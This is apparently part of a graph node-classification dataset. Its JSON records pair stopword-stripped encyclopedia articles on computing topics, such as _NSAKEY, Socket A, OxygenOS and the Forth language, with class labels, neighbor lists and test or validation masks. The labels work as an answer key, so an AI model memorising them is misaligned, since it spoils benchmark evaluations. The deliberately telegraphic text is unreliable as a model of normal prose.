    "text": "Sparse_image:sparse image sparse image type disk image file used macos grows size user adds data image taking much disk space stored encrypted sparse image files used secure user home directory filevault feature mac os x snow leopard earlier sparse images created using disk utility unlike full image file .dmg takes much actual space real disk represents regardless amount unused space sparse image file .sparseimage takes much actual disk space data contained within maximum capacity assigned creation two limitations therefore worth noting regarding use image file format mac os x leopard introduced concept sparse bundle instead single big file sparse bundle bundle directory containing number files called bands order 8 mb size means even though end user sparse bundle appears single file composed smaller files mac os x 10.8 bands 8 mib content image changes one band files changed created deleted allows backup software time machine operate efficiently sparse bundle advantages time machine",
    "neighbors": [
      9762,
      4615,
      10857,
      5482,
      10765,
      11221,
      7422
    ],
    "mask": "Test"
  },
  {
    "node_id": 3890,
    "label": 2,
    "text": "NSAKEY:nsakey computer security cryptography _nsakey variable name discovered windows nt 4 service pack 5 released unstripped symbolic debugging data august 1999 andrew d. fernandes cryptonym corporation variable contained 1024-bit public key microsoft operating systems require cryptography suites work operating systems digital signature since microsoft-approved cryptography suites installed used component windows possible keep export copies operating system products windows installed compliance export administration regulations ear enforced us department commerce bureau industry security bis already known microsoft used two keys primary spare either create valid signatures microsoft failed remove debugging symbols advapi32.dll security encryption driver released service pack 5 windows nt 4.0 andrew fernandes chief scientist cryptonym found primary key stored variable _key second key labeled _nsakey fernandes published discovery touching flurry speculation conspiracy theories including possibility second key owned united states national security agency nsa allowed intelligence agency subvert windows user security presentation computers freedom privacy 2000 cfp2000 conference duncan campbell senior research fellow electronic privacy information center epic mentioned _nsakey controversy example outstanding issue related security surveillance addition dr. nicko van someren found third key windows 2000 doubted legitimate purpose declared looks fishy microsoft denied speculations _nsakey report inaccurate unfounded key question microsoft key maintained safeguarded microsoft shared key nsa party microsoft said key symbol _nsakey nsa technical review authority u.s. export controls key ensures compliance u.s. export laws richard purcell microsoft director corporate privacy approached campbell presentation expressed wish clear confusion doubts _nsakey immediately conference scott culp microsoft security response center contacted campbell offered answer questions correspondence began cordially soon became strained campbell apparently felt culp evasive culp apparently felt campbell hostilely repeating questions already answered 28 april 2000 culp stated definitely reached end discussion ... rapidly spiraling realm conspiracy theory campbell inquiries went unanswered microsoft claimed third key beta builds windows 2000 purpose signing cryptographic service providers http //web.archive.org/web/19990422142445/http //www.mozilla.org:80/crypto-faq.html says fact possible certain circumstances obtain export license software invoking cryptographic functions api example microsoft implementation microsoft cryptographic api cryptoapi specification approved export us even though implements api third parties including third parties outside us add separate modules cryptographic service providers csps implementing cryptographic functionality export approval presumably made possible cryptoapi implementation requires third party csps digitally signed microsoft rejects attempts call csps signed b signing process microsoft ensure compliance relevant us export control regulations e.g. presumably would sign csp developed outside us implements strong cryptography c microsoft cryptoapi implementation available executable form thus presumed reasonably resistant user tampering disable csp digital signature check software industry question whether bxa ear specific requirements backup keys however none claim legal technical expertise necessary authoritatively discuss document following theories presented microsoft stated second key present backup guard possibility losing primary secret key fernandes doubts explanation pointing generally accepted way guard loss secret key secret splitting would divide key several different parts would distributed throughout senior management stated would far robust using two keys second key also lost microsoft would need patch upgrade every copy windows world well every cryptographic module ever signed hand microsoft failed think consequences key loss created first key without using secret splitting secure hardware n't allow protection weakened key generation nsa pointed problem part review process might explain microsoft weakened scheme second key new one called _nsakey second key might backed using secret splitting losing keys need n't problem another possibility microsoft included second key able sign cryptographic modules outside united states still complying bxa ear cryptographic modules signed multiple locations using multiple keys reasonable approach however cryptographic module ever found signed _nsakey microsoft denies certification authority exists microsoft denied nsa access _nsakey secret key possible remove second _nsakey using following note windows software 1999 good news among bad however turns flaw way crypto_verify function implemented way crypto verification occurs users easily eliminate replace nsa key operating system without modifying microsoft original components since nsa key easily replaced means non-us companies free install strong crypto services windows without microsoft nsa approval thus nsa effectively removed export control strong crypto windows demonstration program replaces nsa key found cryptonym website september 1999 anonymous researcher reverse-engineered primary key _nsakey pgp-compatible format published key servers",
    "neighbors": [
      6150,
      11283,
      3605,
      5666,
      11301,
      6697,
      1581,
      7215,
      8757,
      582,
      1098,
      9812,
      8283,
      8798,
      4704,
      10338,
      8296,
      617,
      5225,
      107,
      8299,
      7796,
      6265,
      8315,
      636,
      639,
      641,
      651,
      6797,
      655,
      2196,
      10900,
      3224,
      7838,
      6827,
      3250,
      9910,
      7359,
      4289,
      194,
      10957,
      7887,
      4816,
      4316,
      740,
      9448,
      10989,
      259,
      4356,
      11524,
      782,
      8976,
      3857,
      11030,
      11549,
      7456,
      7970,
      3875,
      11559,
      1832,
      6441,
      7983,
      11060,
      6462,
      321,
      9033,
      6476,
      11605,
      2391,
      4439,
      11103,
      2919,
      8040,
      9585,
      1916,
      8576,
      3463,
      1935,
      8080,
      4505,
      929,
      4515,
      3496,
      7615,
      7106,
      3527,
      4051,
      9173,
      11221,
      5600,
      8681,
      4074,
      5103,
      2558
    ],
    "mask": "None"
  },
  {
    "node_id": 3891,
    "label": 0,
    "text": "Manning's_Law:manning law manning law describes combination principles need balanced design growth universal linguistic dependencies dependencies used describe model syntactic relations languages supports natural language processing major topic event thousands linguistics ai researchers working widely-adopted law put forward christopher manning manning law described consisting six directives may necessarily apply simultaneously often conflict degree",
    "neighbors": [
      7780
    ],
    "mask": "Test"
  },
  {
    "node_id": 3892,
    "label": 3,
    "text": "Socket_A:socket socket also known socket 462 cpu socket used amd processors ranging athlon thunderbird athlon xp/mp 3200+ amd budget processors including duron sempron socket also supports amd geode nx embedded processors derived mobile athlon xp socket zero insertion force pin grid array type 462 pins nine pins blocked socket prevent accidental insertion socket 370 cpus hence number 462 front side bus frequencies supported amd athlon xp sempron 133 mhz 166 mhz 200 mhz socket supports 32-bit cpus socket replaced socket 754 socket 939 2003 2004 respectively except use geode nx processors initially launched 100 mhz fsb support earliest chipsets evolved stepwise faster 200 mhz fsb maintaining pin compatibility throughout lifetime however clock timing bios voltage differences restrict compatibility older chipsets later processors socket dimensions 5.59 cm 5.24 cm without lever x 6.55 cm 2.2 2.06 without lever x 2.58 amd recommends mass socket cpu cooler exceed 300 grams 10.6 ounces heavier coolers may result damage die system properly handled socket processors athlon sempron duron geode nx following mechanical maximum load limits exceeded heatsink assembly shipping conditions standard use load limits may crack processor die make unusable load limits quite small compared load limits socket 478 processors indeed small many users ended cracked processors trying remove attach heatsinks fragile processor core made installing non-standard non-certified heatsink solutions risky business",
    "neighbors": [
      3586,
      9475,
      3588,
      8452,
      3464,
      4872,
      7058,
      10260,
      4246,
      4767,
      2463,
      7712,
      9122,
      1322,
      11183,
      1329,
      8629,
      9400,
      7744,
      7105,
      6978,
      11331,
      9157,
      3783,
      7247,
      9551,
      7122,
      9427,
      7002,
      7132,
      2525,
      4451,
      5859,
      8035,
      10468,
      1260,
      1005,
      7788,
      7151,
      1776,
      1651
    ],
    "mask": "Validation"
  },
  {
    "node_id": 3893,
    "label": 0,
    "text": "Julie_Beth_Lovins:julie beth lovins julie beth lovins computational linguist first published stemming algorithm word matching 1968 lovins stemmer single pass context sensitive stemmer removes endings based longest-match principle stemmer first published extremely well developed considering date release main influence large amount future work area -adam g. et al lovins born october 19th 1945 washington d.c. grew amherst massachusetts father gerald h. lovins worked engineer mother miriam lovins worked social services administrator lovins brother amory lovins environmental scientist co-founder chief scientist rocky mountain institute undergraduate degree lovins attended pembroke college women college brown university later combined brown university 1971 penbroke college lovins studied mathematics linguistics graduated honors thesis named study idioms received inaugural bloch fellowship 1970 linguistic society america attend graduate school lovins obtained 1970 phd 1973 university chicago studying linguistics university chicago dissertation titled loan phonology -- subject matter revision thesis loanwords phonological structure japanese published 1975 indiana university linguistics club following lovins phd spent year working linguist-at-large university tokyo language research institute english conversation teacher joined faculty tsuda college professor english linguistics taught seven years time faculty member tsuda college lovins also served guest researcher university tokyo research institute logopedics phoniatrics research center speech science teaching japanese phonology prestigious japanese universities abroad lovins moved back u.s. work computing industry worked early speech synthesis bell labs murray hill new jersey bell labs lovins worked osamu fujimura renown japanese linguist credited pioneer speech sciences lovins also worked software engineer various companies silicon valley served consultant computational linguistics throughout 1990s consultant called business language doctor lovins published article work developing stemming algorithm research laboratory electronics mit 1968 lovins stemming algorithm frequently referred lovins stemmer stemming algorithm process taking word suffixes reducing root base word stemming algorithms used improve accuracy information retrieval domain analysis algorithms help find variants terms looked stemming algorithms helpful likely users look particular word might interested related words stemming algorithms prevalent search engines google implement word stemming 2003 means 2003 google search word warm would returned related words like warmth warming first published stemming algorithm lovins work set precedent influenced future work stemming algorithms porter stemmer published martin porter 1980 recognized widely common stemming algorithm stemming english additionally dawson stemmer developed john dawson extension lovins stemmer lovins stemmer follows rule-based affix elimination approach removes longest suffix word word recoded convert stem valid words process split two phases first phase word compared pre-determined list endings word found contain one endings ending removed leaving stem word second phase standardizes spelling exceptions come first phase ensure words slightly different stems properly matched together example word dried phase one results dri match word dry second phase takes care exceptions compared stemmers lovins algorithm fast equipped handle irregular plural words like person people disadvantages many suffixes available table endings sometimes highly unreliable frequently fails form words stems match stems like-meaning words reason technical vocabulary used author lovins moved mountain view california 1979 later old mountain view 1981 partner later husband dr. greg fowler software engineer advocate environmental issues blind free time husband enjoyed taking walks volunteering local community lovins actively volunteered organizations like old mountain view neighborhood association mountain view friends library league women voters mountain view cool cities team mountain view sustainability task force 2016 lovins husband died unexpectedly following heart attack eighteen days husband died lovins diagnosed brain cancer passed away january 26th 2018 hospice surrounded friends caregivers",
    "neighbors": [
      2488,
      1890
    ],
    "mask": "None"
  },
  {
    "node_id": 3894,
    "label": 7,
    "text": "Microsoft_BizTalk_Server:microsoft biztalk server microsoft biztalk server simply biztalk inter-organizational middleware system ioms biztalk server previously positioned application server microsoft changed strategy released appfabric server became official application server research firm gartner consider microsoft offering one 'leaders application integration suites discussion product direction biztalk especially cloud software becoming common microsoft continues support update product offer coverage popular conferences worldwide partner conference azure ipaas integration platform service equivalents biztalk api management logic apps service bus event grid 2013-11-21 2018-05-31 included azure biztalk services successor biztalk 2016 product roadmap slated completion approximately 9 months following general availability windows server 2019 common scenario biztalk enables companies integrate manage automated business processes exchanging business documents purchase orders invoices disparate applications within across organizational boundaries development biztalk server done microsoft visual studio developer create transformation maps transforming one message type another example xml file transformed sap idocs messages inside biztalk implemented xml documents defined xml schemas xsd standard maps implemented xslt standard orchestrations implemented ws-bpel compatible process language xlang schemas maps pipelines orchestrations created visually using graphical tools within microsoft visual studio additional functionality delivered .net assemblies called existing modules—including instance orchestrations maps pipelines business rules starting 2000 following versions released following incomplete list technical features biztalk server human-centric processes implemented directly biztalk server need additional applications like microsoft sharepoint server biztalk server runtime built publish/subscribe architecture sometimes called content-based publish/subscribe messages published biztalk transformed desired format routed one subscribers biztalk makes processing safe serialization called dehydration biztalk terminology placing messages database waiting external events thus preventing data loss architecture binds biztalk microsoft sql server processing flow tracked administrators using administration console biztalk supports transaction flow whole line one customer another biztalk orchestrations also implement long-running transactions biztalk uses adapters communications different protocols message formats specific software products adapters edi file http sftp ftp smtp pop3 soap sql msmq mllp azure logic app azure api management microsoft sharepoint server ibm mainframe zseries cics ims midrange iseries as/400 server ibm db2 ibm websphere mq adapters wcf adapter set added 2006 r2 includes wcf-wshttp wcf-basichttp wcf-nettcp wcf-netmsmq wcf-netnamedpipe wcf-custom wcf-customisolated adapters microsoft also ships biztalk adapter pack includes wcf-based adapters lob systems currently includes adapters sap oracle database oracle e-business suite microsoft sql server mysql peoplesoft enterprise siebel systems additional adapters active directory example available third party microsoft biztalk core partners",
    "neighbors": [
      10624,
      5380,
      9225,
      1935,
      11024,
      1041,
      11030,
      4505,
      10020,
      10413,
      7983,
      10675,
      9909,
      7364,
      5210,
      479,
      10340,
      7022,
      3573,
      502,
      10486,
      6522,
      3323
    ],
    "mask": "None"
  },
  {
    "node_id": 3895,
    "label": 9,
    "text": "ContentBox_Modular_CMS:contentbox modular cms contentbox modular cms open-source content management system cfml created ortus solutions corp. contentbox designed modular hmvc software based hibernate orm coldbox platform contentbox modular cms dual-licensed apache v2 commercial license contentbox modular cms cfml-powered web application runs modern cfml engine including adobe coldfusion 9 lucee 4.5 railo 2 contentbox modular cms also delivered war file standard java servlet container apache tomcat",
    "neighbors": [
      4512,
      5314,
      8739,
      9666,
      102,
      6860,
      3469,
      5677,
      7983,
      4529,
      9618,
      1363,
      148,
      7862,
      9144,
      5048,
      4507
    ],
    "mask": "Test"
  },
  {
    "node_id": 3896,
    "label": 4,
    "text": "John_Threat:john threat john lee a.k.a john threat used name corrupt member masters deception mod new york based hacker group early '90s result participation great hacker war mod rival hacker group legion doom indicted federal wiretapping charges 1992 pled guilty sentenced one year federal detention center participation great hacker war landed cover wired magazine 1994 lee born july 6 1973 brooklyn new york grew brownsville member decepticons brooklyn-based street gang formed early '80s named villains saturday morning cartoon transformers lee attended stuyvesant high school went new york university freshman year nyu lee sentenced prison role great hacker war lee also editing producing directing credits film television 2004 founded mediathreat llc film production company 2005 directed original documentary dead prez bigger hip hop 2011 co-directed music video make single ca n't friends everyone diane martel lee also gained notoriety 2001 revealed anonymous editor urbanexpose.com controversial entertainment gossip website",
    "neighbors": [
      8974
    ],
    "mask": "Test"
  },
  {
    "node_id": 3897,
    "label": 4,
    "text": "Cyber_Resilience_Review:cyber resilience review cyber resilience review crr assessment method developed united states department homeland security dhs voluntary examination operational resilience cyber security practices offered cost dhs operators critical infrastructure state local tribal territorial governments crr service-oriented approach meaning one foundational principles crr organization deploys assets people information technology facilities support specific operational missions services crr offered facilitated workshop format self-assessment package workshop version crr led dhs facilitator critical infrastructure facility workshop typically takes 6–8 hours complete draws cross section personnel critical infrastructure organization information collected facilitated crr protected disclosure protected critical infrastructure information act 2002 information disclosed freedom information act request used civil litigation used regulatory purposes crr self-assessment package allows organization conduct assessment without need direct dhs assistance available download dhs critical infrastructure cyber community voluntary program website package includes automated data answer capture report generation tool facilitation guide comprehensive explanation question crosswalk crr practices criteria national institute standards technology nist cybersecurity framework questions asked crr resulting report versions assessment dhs partnered cert division software engineering institute carnegie mellon university design deploy crr goals practices found assessment derived cert resilience management model cert-rmm version 1.0 crr introduced 2009 received significant revision 2014 crr comprises 42 goals 141 specific practices extracted cert-rmm organized 10 domains domain composed purpose statement set specific goals associated practice questions unique domain standard set maturity indicator level mil questions mil questions examine institutionalization practices within organization.the performance organization scored mil scale scale depicts capability divided five levels mil1-incomplete mil2-performed mil3-managed mil4-measured mil5-defined institutionalization means cybersecurity practices become deeper lasting part organization managed supported meaningful ways cybersecurity practices become institutionalized—or “ embedded ” —managers confidence practices ’ predictability reliability practices also become likely sustained times disruption stress organization maturity also lead tighter alignment cybersecurity activities organization ’ business drivers example mature organizations managers provide oversight particular domain evaluate effectiveness security activities domain comprises number goals practice questions varies domain set mil questions concepts encompass domains crr questions three possible responses “ yes ” “ ” “ incomplete crr measures performance organization practice goal domain mil levels scores calculated individual model elements aggregated totals scoring rubric establishes following conditions met organization said achieving domain performed state practices define domain observable determination made degree practices conditions tested applying common set 13 mil questions domain mil1 achieved consistent architecture mil scale mils cumulative achieve mil specific domain organization must perform practices level preceding mils example organization must perform domain practices mil1 mil2 achieve mil2 domain crr participants receive comprehensive report containing results question domains report also provides graphical summaries organization ’ performance goal domain levels depicted heat-map matrix detailed representation allows organizations target improvement fine-grained level organizations participating facilitated crrs receives additional set graphs depicting performance organization compared prior participants crr report includes potential path toward improving performance practice options consideration primarily sourced cert-rmm nist special publications organizations also use crr results measure perform relation criteria nist cybersecurity framework correlation feature introduced february 2014",
    "neighbors": [
      4936,
      6019
    ],
    "mask": "Test"
  },
  {
    "node_id": 3898,
    "label": 6,
    "text": "DCE_Distributed_File_System:dce distributed file system dce distributed file system dce/dfs remote file access protocol used distributed computing environment variant andrew file system afs based afs version 3.0 protocol developed commercially transarc corporation afs version 3.0 turn based afs version 2.0 protocol also used coda disconnected file system originally developed carnegie mellon university dce/dfs consisted multiple cooperative components provided network file system strong file system semantics attempting mimic behavior posix local file systems taking advantage performance optimizations possible dce/dfs client system utilized locally managed cache would contain copies regions original file client system would coordinate server system original copy file stored ensure multiple clients accessing file would re-fetch cached copy file data original file changed advantage approach provided good performance even slow network connections file access actually done local cached regions file server failed client could continue making changes file locally storing back server became available dce/dfs also divorced concept logical units management filesets underlying volume fileset stored allowed administrative control location fileset manner transparent end user support advanced dce/dfs features local journaling file system dce/lfs also known episode developed provide full range support options ibm maintained since 2005 http //www-306.ibm.com/software/stormgmt/dfs/ ibm working replacement dce/dfs called adfs advanced distributed file system one major goal project decouple dfs complexities dce cell directory services cds security services secd another key feature would elimination enctype limitations associated dce/rpc public mention effort made since 2005 leading many believe project killed dce distributed file system dfs adopted open software foundation 1989 part distributed computing environment",
    "neighbors": [
      9189,
      3018,
      2314,
      5580,
      7789,
      3826,
      2395
    ],
    "mask": "Validation"
  },
  {
    "node_id": 3899,
    "label": 9,
    "text": "Isomorphic_JavaScript:isomorphic javascript isomorphic javascript also known universal javascript describes javascript applications run client server isomorphic javascript works context single-page application spa typical spa application logic including routing encapsulated bundled javascript file sent client whilst frees server handle many requests also makes initial load slow client entire application needs sent client isomorphic javascript client web page first requested server view page generated server similar server-side dynamic web pages sent client client render view immediately initial view rendered complete spa downloaded background subsequent actions handled client-side naming term 'isomorphic javascript matter controversy term 'isomorphic first coined charlie robbins nodejitsu one company blog posts spike brehm software engineer airbnb wrote another blog post using term however others proposed use term universal javascript instead several isomorphic javascript frameworks libraries created notably meteor framework react library others includes next.js nuxt rendr derby miso ezel catberry",
    "neighbors": [
      4490,
      3462
    ],
    "mask": "None"
  },
  {
    "node_id": 3900,
    "label": 2,
    "text": "OxygenOS:oxygenos oxygenos customized version android mobile operating system developed chinese smartphone manufacturer oneplus exclusively smartphones oxygenos developed overseas market also another version os designed specifically chinese home market called hydrogenos interview published 3 september 2016 xda developers revealed oneplus actively merging platforms oxygenos hydrogenos single cohesive operating system notable features version 2.0 2.1.1 include app permissions waves maxxaudio swiftkey keyboard off-screen gestures custom icons dark mode manual camera mode raw support 3rd party apps like camera fv-5 2.75 14 june 2016 oneplus released oxygenos 3.0 version android modifications internal tuning like gestures shelf dark mode oneplus 31 december 2016 oneplus released oxygenos 4.0.0 based android nougat includes features several modifications public via ota download 31 january 2018 oneplus released oxygenos 5.0.3 based android oreo public via ota download may 2018 oneplus launched oneplus 6 oxygenos based android oreo 8.1 29 october 2018 oneplus launched oneplus 6t oxygenos 9.0 based android pie 25 december 2018 oneplus released oxygenos 9.0.0 based android pie oneplus 5/5t public via ota download 10 october 2017 security researcher discovered oxygenos system service named devicemanagerservice collects sensitive data sends back oneplus servers service collects many data points including device serial number phone number imei network connections timestamped records user activity within every app users uninstall system service via adb later oneplus released statement data collection analytics claiming data used system improvement optimization shared third parties disabled users system settings oneplus also says revising data analysis mechanism longer collect certain data 2014 oneplus promised close stock bloat-free highly customizable experience soon held name rom contest search name 30 january 2015 oneplus officially announced names oxygenos hydrogenos winner contest midifire belgium flown headquarters shenzhen got meet team along ceo pete lau",
    "neighbors": [
      5637,
      8719,
      3600,
      7700,
      9244,
      11294,
      1578,
      5677,
      1083,
      6212,
      69,
      8262,
      1608,
      4685,
      3664,
      8280,
      8285,
      2658,
      11391,
      1670,
      5262,
      10393,
      7835,
      673,
      8870,
      1191,
      196,
      8907,
      2259,
      8413,
      9949,
      1255,
      8940,
      5892,
      7428,
      2828,
      280,
      10009,
      10525,
      798,
      288,
      2852,
      8486,
      10537,
      7983,
      3380,
      5431,
      2875,
      10045,
      11082,
      332,
      3409,
      8019,
      2901,
      5467,
      3940,
      7548,
      4995,
      9610,
      10129,
      5522,
      1427,
      10645,
      2978,
      1959,
      937,
      5546,
      6057,
      7595,
      2001,
      479,
      1516,
      5100,
      5613,
      5620,
      11252,
      2045
    ],
    "mask": "Test"
  },
  {
    "node_id": 3901,
    "label": 9,
    "text": "Apple_Media_Tool:apple media tool apple media tool multimedia authoring tool associated programming environment sold apple late 1990s primarily aimed producing multimedia presentations distribution cd-rom aimed graphic designers programming experience featured advanced user interface object-oriented user model made production rich complex presentations easy amt system developed patrick soquet developer belgium working arborescence french company later acquired havas 1993 onwards marketed apple development done independent team led soquet 1996 development tool taken apple 2.1 version program developed house team engineers california led dan crow 1997 apple decided concentrate multimedia offerings quicktime hypercard rights amt returned havas patrick soquet acquired rights co-founded tribeworks developed new tool based aml called ishell major features apple media tool graphical authoring tool amt associated programming environment apple media tool programming environment amtpe compiler debugger underlying apple media language aml also known key language amt notable one first authoring systems support embedding apple pioneering qtvr movie format aml object-oriented programming language based eiffel specialized multimedia programming although amt require programming experience use produced complete aml programs compiled byte code interpreted runtime interpreter ampte could used enhance aml code create complex programs example accessing database retrieve media aml conceptually similar java write run anywhere approach cross-platform development runtime interpreters classic mac os windows platforms",
    "neighbors": [
      576,
      4844,
      6797,
      8262
    ],
    "mask": "Test"
  },
  {
    "node_id": 3902,
    "label": 0,
    "text": "Noisy_channel_model:noisy channel model noisy channel model framework used spell checkers question answering speech recognition machine translation model goal find intended word given word letters scrambled manner given alphabet formula_1 let formula_2 set finite strings formula_1 let dictionary formula_4 valid words subset formula_2 i.e. formula_6 noisy channel matrix formula_8 intended word formula_9 scrambled word actually received consider english alphabet formula_10 subset formula_6 makes dictionary valid english words several mistakes may occur typing including construct noisy channel matrix formula_12 must consider probability mistake given intended word formula_13 formula_8 formula_9 probabilities may gathered example considering levenshtein distance formula_16 formula_17 comparing draft essay one manually edited spelling goal noisy channel model find intended word given scrambled word received decision function formula_18 function given scrambled word returns intended word methods constructing decision function include maximum likelihood rule maximum posteriori rule minimum distance rule cases may better accept scrambled word intended word rather attempt find intended word dictionary example word schönfinkeling may dictionary might fact intended word",
    "neighbors": [
      11538,
      7164,
      10557
    ],
    "mask": "None"
  },
  {
    "node_id": 3903,
    "label": 2,
    "text": "Linpus_Linux:linpus linux linpus linux fedora-based operating system created taiwanese firm linpus technologies inc. linpus designed specifically fully support asian market full unicode support chinese japanese languages special version linpus lite written run devices lower-cost hardware netbooks icon tab-based simple mode designed new users conventional style pc mode wanting microsoft windows-like interface targeted handheld devices smaller screens supports resolutions low vga 640×480 acer aspire one norhtec gecko netbooks come linpus lite linux pre-installed also version acer revo 3610 3700 linpus linux pre-installed version normal desktop computers servers also available well multimedia version called linpus media center media center version offers upgrade pack purchase patent licenses mpeg-la dvd mp3 wmv codecs linpus system contains free open source operating system also acer-specific shareware users classify nagware asks register acer website purchase full version fact acer distribution contains software prevents system considered fully free/open operating system",
    "neighbors": [
      4611,
      3079,
      3089,
      4113,
      8209,
      8727,
      543,
      11297,
      7204,
      9253,
      11305,
      5681,
      56,
      3129,
      4153,
      59,
      8248,
      9276,
      4673,
      3654,
      5190,
      3147,
      2125,
      1107,
      1110,
      89,
      3162,
      5721,
      4192,
      3685,
      10860,
      5742,
      2671,
      11388,
      2692,
      8837,
      9353,
      6797,
      9873,
      11410,
      8857,
      10394,
      6301,
      10397,
      5279,
      673,
      3745,
      1700,
      7332,
      7845,
      10920,
      9899,
      3245,
      7854,
      2738,
      4790,
      4279,
      10425,
      2239,
      9407,
      2763,
      8907,
      3791,
      6352,
      7385,
      11481,
      4841,
      6890,
      7913,
      6380,
      7920,
      6898,
      5363,
      9461,
      1782,
      6393,
      5369,
      8957,
      4355,
      7435,
      2321,
      5397,
      6934,
      4887,
      8992,
      10530,
      6436,
      2853,
      3369,
      7983,
      823,
      3387,
      11587,
      2375,
      5959,
      9048,
      8033,
      2914,
      5990,
      9064,
      7020,
      7534,
      11121,
      9074,
      11648,
      390,
      1416,
      905,
      10127,
      912,
      405,
      10646,
      11669,
      926,
      9119,
      10149,
      6055,
      7082,
      1455,
      948,
      439,
      10694,
      4039,
      975,
      9689,
      2010,
      9693,
      485,
      495,
      8177,
      8180,
      5110,
      11263
    ],
    "mask": "Validation"
  },
  {
    "node_id": 3904,
    "label": 9,
    "text": "Forth_(programming_language):forth programming language forth imperative stack-based computer programming language environment originally designed charles chuck moore language features include structured programming reflection ability examine modify program structure execution concatenative programming functions composed juxtaposition extensibility programmer create new commands although acronym language name sometimes spelled capital letters forth following customary usage earlier years procedural programming language without type checking forth features interactive execution commands making suitable shell systems lack formal operating system ability compile sequences commands later execution much forth existence standard technique compile threaded code modern implementations generate optimized machine code like language compilers forth used open firmware boot loader space applications philae spacecraft embedded systems involve interaction hardware bestselling 1986 computer game starflight electronic arts written custom forth free software gforth implementation actively maintained several commercially supported systems forth simple yet extensible language modularity extensibility permit writing significant programs forth environment combines compiler interactive shell user defines runs subroutines called words words tested redefined debugged source entered without recompiling restarting whole program syntactic elements including variables basic operators defined words forth environments vary resulting program stored ideally running program effect manually re-entering source programming environments recursive subroutines use stack control flow structure typically also stores local variables including subroutine parameters call value system c forth often local variables however call-by-value instead intermediate values kept another stack different one uses return addresses loop counters etc words operate directly topmost values first two stacks may therefore called parameter data stack often simply stack second function-call stack called linkage return stack abbreviated rstack special rstack manipulation functions provided kernel allow used temporary storage within word often used counted loops otherwise used pass parameters manipulate data words specified terms effect stack typically parameters placed top stack word executes execution parameters erased replaced return values arithmetic operators follows rule reverse polish notation see examples illustrating stack usage forth used successfully large complex projects applications developed competent disciplined professionals proven easily maintained evolving hardware platforms decades use forth niche astronomical space applications forth still used today many embedded systems small computerized devices portability efficient memory use short development time fast execution speed implemented efficiently modern risc processors processors use forth machine language produced uses forth include open firmware boot roms used apple ibm sun olpc xo-1 forth evolved charles h. moore personal programming system continuous development since 1968 forth first exposed programmers early 1970s starting elizabeth rather us national radio astronomy observatory work nrao charles moore elizabeth rather formed forth inc. 1973 refining porting forth systems dozens platforms next decade forth named 1968 file holding interpreter labeled fourth 4th next generation software—but ibm 1130 operating system restricted file names 5 characters moore saw forth successor compile-link-go third-generation programming languages software fourth generation hardware fourth-generation programming language term come used charles moore frequently moved job job career early pressure developing language ease porting different computer architectures forth system often used bring new hardware example forth first resident software new intel 8086 chip 1978 macforth first resident development system 128k macintosh 1984 forth inc. microforth developed intel 8080 motorola 6800 zilog z80 microprocessors starting 1976 microforth later used hobbyists generate forth systems architectures 6502 1978 wide dissemination finally led standardization language common practice codified de facto standards forth-79 forth-83 years 1979 1983 respectively standards unified ansi 1994 commonly referred ans forth forth became popular 1980s well suited small microcomputers time compact portable least one home computer british jupiter ace forth rom-resident operating system canon cat also used forth system programming rockwell produced single-chip microcomputers resident forth kernels r65f11 r65f12 complete family tree tu-wien insoft graforth version forth graphics extensions apple ii asyst forth expansion measuring controlling pcs 2018 source original 1130 version forth recovered updated run restored emulated 1130 system forth relies heavily explicit use data stack reverse polish notation rpn postfix notation commonly used calculators hewlett-packard rpn operator placed operands opposed common infix notation operator placed operands postfix notation makes language easier parse extend forth flexibility makes static bnf grammar inappropriate monolithic compiler extending compiler requires writing new word instead modifying grammar changing underlying implementation using rpn one could get result mathematical expression codice_1 way command line first puts numbers 25 10 implied stack br word codice_2 multiplies two numbers top stack replaces product number 50 placed stack br word codice_3 adds previous product codice_4 moves output new line formatting purposes could omitted but—in implementations—without output would occur line input would less readable example finally codice_5 command prints result user terminal everything completed successfully point text interpreter outputs prompt codice_6 moves new line get input without needing anything explicit even forth structural features stack-based example code defines new word word term used subroutine called codice_7 using following commands codice_8 duplicates number stack codice_9 places 6 top stack codice_10 compares top two numbers stack 6 codice_8ed input replaces true-or-false value codice_12 takes true-or-false value chooses execute commands immediately skip codice_13 codice_14 discards value stack codice_15 ends conditional text parentheses comment advising word expects number stack return possibly changed number codice_7 word equivalent function written c programming language using function written succinctly could run word follows first interpreter pushes number 1 8 onto stack calls codice_7 pops number pushes result codice_4 moves output new line readability finally call codice_5 pops result prints user terminal forth explicit grammar interpreter reads line input user input device parsed word using spaces delimiter systems recognise additional whitespace characters interpreter finds word looks word dictionary word found interpreter executes code associated word returns parse rest input stream word n't found word assumed number attempt made convert number push stack successful interpreter continues parsing input stream otherwise lookup number conversion fail interpreter prints word followed error message indicating word recognised flushes input stream waits new user input definition new word started word codice_20 colon ends word codice_21 semi-colon example compile word codice_22 makes name findable dictionary executed typing codice_23 console print codice_24 forth systems include assembler allows one specify words using processor facilities lowest level mostly assembler tucked away separate namespace wordlist relatively users want use forth assemblers may use reverse-polish syntax parameters instruction precede instruction designs vary widely specific forth implementation typical reverse-polish assembler prepares operands stack mnemonic copy whole instruction memory last step forth assembler nature macro assembler easy define alias registers according role forth system e.g datastackpointer register used stack pointer forth systems run host operating system microsoft windows linux version unix use host operating system file system source data files ansi forth standard describes words used i/o modern forth systems use normal text files source even embedded embedded system resident compiler gets source via serial line classic forth systems traditionally use neither operating system file system instead storing code files source code stored disk blocks written physical disk addresses word codice_25 employed translate number 1k-sized block disk space address buffer containing data managed automatically forth system block use become rare since mid-1990s hosted system blocks allocated normal file case multitasking commonly cooperative round-robin scheduling normally available although multitasking words support covered ansi forth standard word codice_26 used save current task execution context locate next task restore execution context task stacks private copies control variables scratch area swapping tasks simple efficient result forth multitaskers available even simple microcontrollers intel 8051 atmel avr ti msp430 non-standard facilities include mechanism issuing calls host os windowing systems many provide extensions employ scheduling provided operating system typically larger different set words stand-alone forth codice_26 word task creation suspension destruction modification priority full-featured forth system source code compile technique commonly called meta-compilation self-hosting forth programmers although term n't exactly match meta-compilation normally defined usual method redefine handful words place compiled bits memory compiler words use specially named versions fetch store redirected buffer area memory buffer area simulates accesses memory area beginning different address code buffer compilers define words access target computer memory host compiling computer memory fetch store operations redefined code space compiler assembler etc recompiled using new definitions fetch store effectively reuses code compiler interpreter forth system code compiled version stored buffer buffer memory written disk ways provided load temporarily memory testing new version appears work written previous version numerous variations compilers exist different environments embedded systems code may instead written another computer technique known cross compilation serial port even single ttl bit keeping word names non-executing parts dictionary original compiling computer minimum definitions forth compiler words fetch store byte word commands forth word executed often time-consuming part writing remote port constructing initial program implement fetch store execute many modern microprocessors integrated debugging features motorola cpu32 eliminate task basic data structure forth dictionary maps words executable code named data structures dictionary laid memory tree 